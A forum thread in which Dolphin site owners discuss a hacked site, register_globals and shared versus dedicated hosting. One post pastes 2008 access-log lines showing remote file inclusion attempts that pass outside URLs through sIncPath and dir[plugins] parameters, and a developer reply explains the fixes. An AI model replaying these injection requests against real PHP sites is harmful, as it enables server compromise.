Site Hacked

get a dedicated server or host with someone that has a dedicated server, there are a few of us that have a dedicated server and offer hosting, as we setup our servers for our dolphin sites, you can be assured that unlike shared hosting, we protect our own servers from hackers as much as we can.

shared hosts, setup their servers to accomidate for the masses, and leave huge security holes in them.

Yup....this morning it is down again at ixwebhosting.com! Webserver probs!!!!!!!

Even tho we have "dedicated" servers for our domain there, the database is on a "shared" server.

So, far I have not been hacked. (Crossed fingers) But I added the php.ini file suggested by many to alter the register globals that ixwebhosting has ON. (Should be OFF for security)

as noted on the blogs from boonex. there have been two releases that address security problems. but i take the stand sammie has, first of all, read the server requirements that boonex recommends, when you go against what the develper says, then you have to expect to have unpredictable outcomes. now beyond that, if you are on a server where register_globals are ON, then you are defying gravity itself, as stated by php.net, register_globals should be off, and developers should try to write their software so that register_globals are not required to be on.

now when you go to a host where by default, they have turned on register_globals, you have to see the red flags standing up in the air on that one. what happens, is that it doesnt necessarily have to be the dolphin suite that gets hacked, but the server itself, that is the vulnerability moreso than the script. once the server is compromised, the culprits will use whatever avenue they can to access sites and deface them, its a game to them, so one jamokey buys himself a $1.99 hosting account and all his little cronies then try their attacks, once they have a script that has the RFI exploit exposed, then they start posting this information. its not that any one individual pays the money, look at the sparce wan that was hit, most all kids who have a website, be it php or joomla or whatever, they are most likely on a shared server, then they have their clan, and as soon as they find a script with a hole, and its posted on the internet that there is a hole in the script, not otherwise accessible but for the script being hosted on a shared server. now what happens is that they load up a remote shell script (php) and they all get busy looking around in the server. why is it they dont get caught you say, well granted it is a shared server account, nobody really cares if the data gets lost of not from the hosting company, just as 100 $1.99 accounts leave, 100 $1.99 accounts come in the next day. this server is not monitored, and you are just fair game when you are on a shared hosting environment.

so yes, you can apply what patches you can find, you can upload the latest release, but to me this is only running on a wing and a prayer. you need to get to a minimum VPS and better than that is a Dedicated server. well i am done rambling

later,
DosDawg

you can not be on a dedicated server, you have your own box and your own database is on that box,
so you must be on shared hosting, if you have to use a database other than localhost.
godaddy have the same setup with their shared hosting, they have you use a database on another server,

this is a chat i had with your host:

i believe you are mixing a dedicated ip with a dedicated server, they do not have any VPS or dedicated servers on offer for hosting.

Chat InformationPlease wait for a site operator to respond.

Chat InformationYou are now chatting with 'Alex Golovko'

Alex Golovko: Hello, my name is Alex, please let me know how can I help you today?

you: hi, i was looking at your site and i do not see any dedcated servers or VPS

you: do you not offer either?

you: or are you just a shared hosting plan?

Alex Golovko: We're not providing dedicated or VSP servers sorry, all servers shared

you: ok thank you ever so much for your help, have a nice day

this comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

hackers can run any application they like

love it

If they have register globals on with all there severs that seems odd. Maybe they are using a older version of php which could potentially be the cause of other Vulnerabilities. But that wouldn't make sense that they wouldn't just turn it off. Or possibly something with their setup in particular the software they run is an older script that requires register globals on. I don't know hspere that well, last time I checked that's what they were running. Or maybe their billing/automation script requires this. It does seem kind of odd that a fairly large host like ixwebhosting hasn't had other problems related to register globals on and made some adjustments.

Thanks sammie,DosDawg,gameutopia for your inputs.
I would certainly go for a dedicated server once the site becomes bit busy. I would atleast go for a VPS for now but I am still not convinced that I would be safe either.I have chosen IX after knowing that it was one of the best sites and I host several of my other websites over there now.I think I will have to change the host now.
I looked at the log files and found these
189.112.40.11 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem1/jovemNOR.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
216.206.238.35 - - [24/Jul/2008:21:50:23 -0500] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 98 "-" "libwww-perl/5.803"
148.223.69.2 - - [24/Jul/2008:21:53:28 -0500] "GET //?sIncPath=http://hibbard22.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"
189.112.40.11 - - [24/Jul/2008:22:12:43 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem2/id.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
98.129.33.59 - - [24/Jul/2008:22:27:29 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
67.205.76.81 - - [24/Jul/2008:22:27:07 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 302 5 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 15239 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:56 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:28:43 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
216.246.91.250 - - [24/Jul/2008:22:28:44 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
216.246.91.250 - - [24/Jul/2008:22:28:04 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:40 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:48 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:40:30 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
82.128.9.68 - - [25/Jul/2008:04:59:49 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=back HTTP/1.1" 200 131 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
82.128.9.68 - - [25/Jul/2008:04:59:50 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=home HTTP/1.1" 200 221 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"

1. If you will have register globals in Off
such injections will impossible
xxx.php?sIncPath=unwanted_code_path

2. since 6.1.4 we always re-setup all variables before using, so in even don`t will get incoming params

3. we don`t use global $dir more in not-safe places